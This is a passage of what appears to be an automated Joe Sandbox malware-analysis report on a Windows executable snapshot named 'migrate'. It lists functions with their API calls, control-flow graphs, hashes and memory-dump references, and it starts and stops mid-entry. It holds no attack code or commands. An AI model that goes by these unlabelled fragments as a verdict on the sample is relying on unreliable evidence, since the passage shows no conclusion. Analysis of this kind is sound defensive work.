                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_110000_migrate.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _wcslen$MessageSendTextWindow$EnvironmentExpandH_prologItemStrings_wcsrchr
                                                                                                                                                                                                    • String ID: %s.%d.tmp$<br>$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion
                                                                                                                                                                                                    • API String ID: 2804936435-312220925
                                                                                                                                                                                                    • Opcode ID: 0c5755f0a700a530f564071027051a7f677485f549fadfc75f16f8b82ef6a214
                                                                                                                                                                                                    • Instruction ID: 81b58d91b8350bb2bc1d525d5877ca507c567978fde385dd25022707fd436d16
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0c5755f0a700a530f564071027051a7f677485f549fadfc75f16f8b82ef6a214
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 22E176B2900229ABDF25DBA4EC85EEE73BCAF14350F4441A5F619E3050EB749F948F60
                                                                                                                                                                                                    Function 0011DA67 Relevance: 23.4, APIs: 4, Strings: 9, Instructions: 663COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • __EH_prolog.LIBCMT ref: 0011DA70
                                                                                                                                                                                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 0011DAAC
                                                                                                                                                                                                      • Part of subcall function 0011C29A: _wcslen.LIBCMT ref: 0011C2A2
                                                                                                                                                                                                      • Part of subcall function 001205DA: _wcslen.LIBCMT ref: 001205E0
                                                                                                                                                                                                      • Part of subcall function 00121B84: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,0011BAE9,00000000,?,?,?,000801EA), ref: 00121BA0
                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 0011DDE9
                                                                                                                                                                                                    • __fprintf_l.LIBCMT ref: 0011DF1C
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_110000_migrate.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _wcslen$ByteCharFileH_prologModuleMultiNameWide__fprintf_l
                                                                                                                                                                                                    • String ID: $ ,$$%s:$*messages***$*messages***$@%s:$R$RTL$a
                                                                                                                                                                                                    • API String ID: 566448164-801612888
                                                                                                                                                                                                    • Opcode ID: 0c37dd6170afda791724d576363d46bf10bf5797947fc4389751622d2ace40c7
                                                                                                                                                                                                    • Instruction ID: 1cf3710e775ceb47c3fddb44011336e7d775cf57aebfd0f7cb3b8bf22bbb3dd6
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0c37dd6170afda791724d576363d46bf10bf5797947fc4389751622d2ace40c7
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2B32DF71A00218ABCF2DEFA8D842BEE77A5FF19304F40456AF90597291E7B1D9C5CB90
                                                                                                                                                                                                    Function 0012D4D4 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 97windowCOMMON
                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 0012B568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0012B579
                                                                                                                                                                                                      • Part of subcall function 0012B568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0012B58A
                                                                                                                                                                                                      • Part of subcall function 0012B568: IsDialogMessageW.USER32(000801EA,?), ref: 0012B59E
                                                                                                                                                                                                      • Part of subcall function 0012B568: TranslateMessage.USER32(?), ref: 0012B5AC
                                                                                                                                                                                                      • Part of subcall function 0012B568: DispatchMessageW.USER32(?), ref: 0012B5B6
                                                                                                                                                                                                    • GetDlgItem.USER32(00000068,0016FCB8), ref: 0012D4E8
                                                                                                                                                                                                    • ShowWindow.USER32(00000000,00000005,?,?,?,0012AF07,00000001,?,?,0012B7B9,0014506C,0016FCB8,0016FCB8,00001000,00000000,00000000), ref: 0012D510
                                                                                                                                                                                                    • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 0012D51B
                                                                                                                                                                                                    • SendMessageW.USER32(00000000,000000C2,00000000,001435F4), ref: 0012D529
                                                                                                                                                                                                    • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0012D53F
                                                                                                                                                                                                    • SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 0012D559
                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0012D59D
                                                                                                                                                                                                    • SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 0012D5AB
                                                                                                                                                                                                    • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0012D5BA
                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0012D5E1
                                                                                                                                                                                                    • SendMessageW.USER32(00000000,000000C2,00000000,001443F4), ref: 0012D5F0
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_110000_migrate.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Message$Send$DialogDispatchItemPeekShowTranslateWindow
                                                                                                                                                                                                    • String ID: \
                                                                                                                                                                                                    • API String ID: 3569833718-2967466578
                                                                                                                                                                                                    • Opcode ID: 342b7304e8705ddaf76ebd97a85e44149c3b8521a885469dafd5670b2317a63d
                                                                                                                                                                                                    • Instruction ID: a9c23be277350ed09922f363383fb041e90af09020b3124b577c831b372b1457
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 342b7304e8705ddaf76ebd97a85e44149c3b8521a885469dafd5670b2317a63d
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8A31D371145342EFD301DF20EC4AFAB7FBCEB82705F000908F5A59A5A0DB649A849776
                                                                                                                                                                                                    Function 0012A6C2 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 100memorywindowCOMMON
                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                    control_flow_graph 812 12a6c2-12a6df FindResourceW 813 12a6e5-12a6f6 SizeofResource 812->813 814 12a7db 812->814 813->814 815 12a6fc-12a70b LoadResource 813->815 816 12a7dd-12a7e1 814->816 815->814 817 12a711-12a71c LockResource 815->817 817->814 818 12a722-12a737 GlobalAlloc 817->818 819 12a7d3-12a7d9 818->819 820 12a73d-12a746 GlobalLock 818->820 819->816 821 12a7cc-12a7cd GlobalFree 820->821 822 12a74c-12a76a call 130320 CreateStreamOnHGlobal 820->822 821->819 825 12a7c5-12a7c6 GlobalUnlock 822->825 826 12a76c-12a78e call 12a626 822->826 825->821 826->825 831 12a790-12a798 826->831 832 12a7b3-12a7c1 831->832 833 12a79a-12a7ae GdipCreateHBITMAPFromBitmap 831->833 832->825 833->832 834 12a7b0 833->834 834->832
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • FindResourceW.KERNELBASE(?,PNG,00000000,?,?,?,0012B73D,00000066), ref: 0012A6D5
                                                                                                                                                                                                    • SizeofResource.KERNEL32(00000000,?,?,?,0012B73D,00000066), ref: 0012A6EC
                                                                                                                                                                                                    • LoadResource.KERNEL32(00000000,?,?,?,0012B73D,00000066), ref: 0012A703
                                                                                                                                                                                                    • LockResource.KERNEL32(00000000,?,?,?,0012B73D,00000066), ref: 0012A712
                                                                                                                                                                                                    • GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,0012B73D,00000066), ref: 0012A72D
                                                                                                                                                                                                    • GlobalLock.KERNEL32(00000000), ref: 0012A73E
                                                                                                                                                                                                    • CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 0012A762
                                                                                                                                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 0012A7C6
                                                                                                                                                                                                      • Part of subcall function 0012A626: GdipAlloc.GDIPLUS(00000010), ref: 0012A62C
                                                                                                                                                                                                    • GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 0012A7A7
                                                                                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 0012A7CD
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_110000_migrate.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Global$Resource$AllocCreateGdipLock$BitmapFindFreeFromLoadSizeofStreamUnlock
                                                                                                                                                                                                    • String ID: PNG
                                                                                                                                                                                                    • API String ID: 211097158-364855578
                                                                                                                                                                                                    • Opcode ID: e48df84b459c0a21bc9df7e227ec09e58a7ebab297ade6ef17ec5cf9dcd17ba8
                                                                                                                                                                                                    • Instruction ID: fbb05e972f5c36fd37f35e94c2669c3f65ff78030e1672e7c95014e9b5aeef08
                                                                                                                                                                                                    • Opcode Fuzzy Hash: e48df84b459c0a21bc9df7e227ec09e58a7ebab297ade6ef17ec5cf9dcd17ba8
                                                                                                                                                                                                    • Instruction Fuzzy Hash: BF31C27A600712BFD7119F21EC88D1B7BB9FF85B61B000918F91592A70EB32DC90CBA1
                                                                                                                                                                                                    Function 0012D78F Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 184COMMON
                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                    control_flow_graph 836 12d78f-12d7a7 call 12ec50 839 12d9e8-12d9f0 836->839 840 12d7ad-12d7b9 call 133e13 836->840 840->839 843 12d7bf-12d7e7 call 12fff0 840->843 846 12d7f1-12d7ff 843->846 847 12d7e9 843->847 848 12d812-12d818 846->848 849 12d801-12d804 846->849 847->846 851 12d85b-12d85e 848->851 850 12d808-12d80e 849->850 853 12d810 850->853 854 12d837-12d844 850->854 851->850 852 12d860-12d866 851->852 857 12d868-12d86b 852->857 858 12d86d-12d86f 852->858 859 12d822-12d82c 853->859 855 12d9c0-12d9c2 854->855 856 12d84a-12d84e 854->856 862 12d9c6 855->862 856->862 863 12d854-12d859 856->863 857->858 864 12d882-12d898 call 11b92d 857->864 858->864 865 12d871-12d878 858->865 860 12d81a-12d820 859->860 861 12d82e 859->861 860->859 868 12d830-12d833 860->868 861->854 869 12d9cf 862->869 863->851 872 12d8b1-12d8bc call 11a231 864->872 873 12d89a-12d8a7 call 121fbb 864->873 865->864 866 12d87a 865->866 866->864 868->854 871 12d9d6-12d9d8 869->871 875 12d9e7 871->875 876 12d9da-12d9dc 871->876 882 12d8d9-12d8e6 ShellExecuteExW 872->882 883 12d8be-12d8d5 call 11b6c4 872->883 873->872 881 12d8a9 873->881 875->839 876->875 880 12d9de-12d9e1 ShowWindow 876->880 880->875 881->872 882->875 885 12d8ec-12d8f9 882->885 883->882 887 12d8fb-12d902 885->887 888 12d90c-12d90e 885->888 887->888 889 12d904-12d90a 887->889 890 12d910-12d919 888->890 891 12d925-12d944 call 12dc3b 888->891 889->888 892 12d97b-12d987 CloseHandle 889->892 890->891 898 12d91b-12d923 ShowWindow 890->898 891->892 905 12d946-12d94e 891->905 894 12d998-12d9a6 892->894 895 12d989-12d996 call 121fbb 892->895 894->871 897 12d9a8-12d9aa 894->897 895->869 895->894 897->871 901 12d9ac-12d9b2 897->901 898->891 901->871 904 12d9b4-12d9be 901->904 904->871 905->892 906 12d950-12d961 GetExitCodeProcess 905->906 906->892 907 12d963-12d96d 906->907 908 12d974 907->908 909 12d96f 907->909 908->892 909->908
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 0012D7AE
                                                                                                                                                                                                    • ShellExecuteExW.SHELL32(?), ref: 0012D8DE
                                                                                                                                                                                                    • ShowWindow.USER32(?,00000000), ref: 0012D91D
                                                                                                                                                                                                    • GetExitCodeProcess.KERNEL32(?,?), ref: 0012D959
                                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 0012D97F
                                                                                                                                                                                                    • ShowWindow.USER32(?,00000001), ref: 0012D9E1
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_110000_migrate.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ShowWindow$CloseCodeExecuteExitHandleProcessShell_wcslen
                                                                                                                                                                                                    • String ID: .exe$.inf
                                                                                                                                                                                                    • API String ID: 36480843-3750412487
                                                                                                                                                                                                    • Opcode ID: 132138c0d9b03ffa65fd87e319bcd47506d96a8af3544a58b76ce41ac6933b0d
                                                                                                                                                                                                    • Instruction ID: 2586bfc3c32b3044c887554b817c1c5a3a519c58de7e8015eb1a1ca0a722af53
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 132138c0d9b03ffa65fd87e319bcd47506d96a8af3544a58b76ce41ac6933b0d
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5551D4704083A09AEB319F24F844BABBBE4AF55748F04041EF9C5971A1E7B18EE5DB52
                                                                                                                                                                                                    Function 0013A95B Relevance: 9.2, APIs: 6, Instructions: 216COMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                    control_flow_graph 910 13a95b-13a974 911 13a976-13a986 call 13ef4c 910->911 912 13a98a-13a98f 910->912 911->912 919 13a988 911->919 914 13a991-13a999 912->914 915 13a99c-13a9c0 MultiByteToWideChar 912->915 914->915 917 13ab53-13ab66 call 12fbbc 915->917 918 13a9c6-13a9d2 915->918 920 13aa26 918->920 921 13a9d4-13a9e5 918->921 919->912 923 13aa28-13aa2a 920->923 924 13a9e7-13a9f6 call 142010 921->924 925 13aa04-13aa15 call 138e06 921->925 927 13aa30-13aa43 MultiByteToWideChar 923->927 928 13ab48 923->928 924->928 938 13a9fc-13aa02 924->938 925->928 935 13aa1b 925->935 927->928 931 13aa49-13aa5b call 13af6c 927->931 932 13ab4a-13ab51 call 13abc3 928->932 940 13aa60-13aa64 931->940 932->917 939 13aa21-13aa24 935->939 938->939 939->923 940->928 942 13aa6a-13aa71 940->942 943 13aa73-13aa78 942->943 944 13aaab-13aab7 942->944 943->932 947 13aa7e-13aa80 943->947 945 13ab03 944->945 946 13aab9-13aaca 944->946 950 13ab05-13ab07 945->950 948 13aae5-13aaf6 call 138e06 946->948 949 13aacc-13aadb call 142010 946->949 947->928 951 13aa86-13aaa0 call 13af6c 947->951 954 13ab41-13ab47 call 13abc3 948->954 964 13aaf8 948->964 949->954 962 13aadd-13aae3 949->962 950->954 955 13ab09-13ab22 call 13af6c 950->955 951->932 966 13aaa6 951->966 954->928 955->954 968 13ab24-13ab2b 955->968 967 13aafe-13ab01 962->967 964->967 966->928 967->950 969 13ab67-13ab6d 968->969 970 13ab2d-13ab2e 968->970 971 13ab2f-13ab3f WideCharToMultiByte 969->971 970->971 971->954 972 13ab6f-13ab76 call 13abc3 971->972 972->932
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,001357FB,001357FB,?,?,?,0013ABAC,00000001,00000001,2DE85006), ref: 0013A9B5
                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,0013ABAC,00000001,00000001,2DE85006,?,?,?), ref: 0013AA3B
                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,2DE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0013AB35
                                                                                                                                                                                                    • __freea.LIBCMT ref: 0013AB42
                                                                                                                                                                                                      • Part of subcall function 00138E06: RtlAllocateHeap.NTDLL(00000000,?,?,?,00134286,?,0000015D,?,?,?,?,00135762,000000FF,00000000,?,?), ref: 00138E38
                                                                                                                                                                                                    • __freea.LIBCMT ref: 0013AB4B
                                                                                                                                                                                                    • __freea.LIBCMT ref: 0013AB70
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_110000_migrate.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1414292761-0
                                                                                                                                                                                                    • Opcode ID: e5ffd78a591f42afe81575ebc125fd1df17b4e2ee6169e0717893f3851c9935c
                                                                                                                                                                                                    • Instruction ID: 24246081b26e65910fd57e2f2dfa857508716c04aefb00b32f9328764229d81f
                                                                                                                                                                                                    • Opcode Fuzzy Hash: e5ffd78a591f42afe81575ebc125fd1df17b4e2ee6169e0717893f3851c9935c
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0751E372610216AFDB258F64CC82EBFB7AAEF54710F954628FC44E7154EB34DC80C6A2
                                                                                                                                                                                                    Function 00133B72 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 63COMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                    control_flow_graph 975 133b72-133b7c 976 133bee-133bf1 975->976 977 133bf3 976->977 978 133b7e-133b8c 976->978 981 133bf5-133bf9 977->981 979 133b95-133bb1 LoadLibraryExW 978->979 980 133b8e-133b91 978->980 984 133bb3-133bbc GetLastError 979->984 985 133bfa-133c00 979->985 982 133b93 980->982 983 133c09-133c0b 980->983 986 133beb 982->986 983->981 987 133be6-133be9 984->987 988 133bbe-133bd3 call 136088 984->988 985->983 989 133c02-133c03 FreeLibrary 985->989 986->976 987->986 988->987 992 133bd5-133be4 LoadLibraryExW 988->992 989->983 992->985 992->987
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,?,00133C35,00000000,00000FA0,00172088,00000000,?,00133D60,00000004,InitializeCriticalSectionEx,00146394,InitializeCriticalSectionEx,00000000), ref: 00133C03
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_110000_migrate.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: FreeLibrary
                                                                                                                                                                                                    • String ID: api-ms-
                                                                                                                                                                                                    • API String ID: 3664257935-2084034818
                                                                                                                                                                                                    • Opcode ID: 931c68ec0e65ce27c79cd5ec9ba797dc8dad4fe3494e67dedb82d4a55e99d3ad
                                                                                                                                                                                                    • Instruction ID: 756e2a2f5e57f3aba86c8b69a5e981c1e60abd22a4f59e0f895cf81a1e4083fd
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 931c68ec0e65ce27c79cd5ec9ba797dc8dad4fe3494e67dedb82d4a55e99d3ad
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5F112935A05220ABCB228B689C41B5DF764AF02770F250211F935FB2A4E771EF4086E9
                                                                                                                                                                                                    Function 0012AC16 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 34comCOMMON
                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 0012081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00120836
                                                                                                                                                                                                      • Part of subcall function 0012081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0011F2D8,Crypt32.dll,00000000,0011F35C,?,?,0011F33E,?,?,?), ref: 00120858
                                                                                                                                                                                                    • OleInitialize.OLE32(00000000), ref: 0012AC2F
                                                                                                                                                                                                    • GdiplusStartup.GDIPLUS(?,?,00000000), ref: 0012AC66
                                                                                                                                                                                                    • SHGetMalloc.SHELL32(00158438), ref: 0012AC70
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_110000_migrate.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: DirectoryGdiplusInitializeLibraryLoadMallocStartupSystem
                                                                                                                                                                                                    • String ID: riched20.dll$3Ro
                                                                                                                                                                                                    • API String ID: 3498096277-3613677438
                                                                                                                                                                                                    • Opcode ID: e1099a0d39406643bff8d61f2cdc80ae6528581bf040e6fb2396a7e64036fc34
                                                                                                                                                                                                    • Instruction ID: 62842bf28af7f19ee232c11ef12544cdf8cbc2a2f4c33d543a4e55298bfde301
                                                                                                                                                                                                    • Opcode Fuzzy Hash: e1099a0d39406643bff8d61f2cdc80ae6528581bf040e6fb2396a7e64036fc34
                                                                                                                                                                                                    • Instruction Fuzzy Hash: C6F01DB1D00219ABCB10AFA9DC49AEFFFFCEF94701F00415AE815E2251DBB456858FA1
                                                                                                                                                                                                    Function 0011F2C5 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 20libraryloaderCOMMON
                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                    control_flow_graph 997 11f2c5-11f2cc 998 11f301-11f302 997->998 999 11f2ce-11f2dc call 12081b 997->999 1002 11f2fd 999->1002 1003 11f2de-11f2fa GetProcAddress * 2 999->1003 1002->998 1003->1002
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 0012081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00120836
                                                                                                                                                                                                      • Part of subcall function 0012081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0011F2D8,Crypt32.dll,00000000,0011F35C,?,?,0011F33E,?,?,?), ref: 00120858
                                                                                                                                                                                                    • GetProcAddress.KERNELBASE(00000000,CryptProtectMemory), ref: 0011F2E4
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(001581C8,CryptUnprotectMemory), ref: 0011F2F4
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
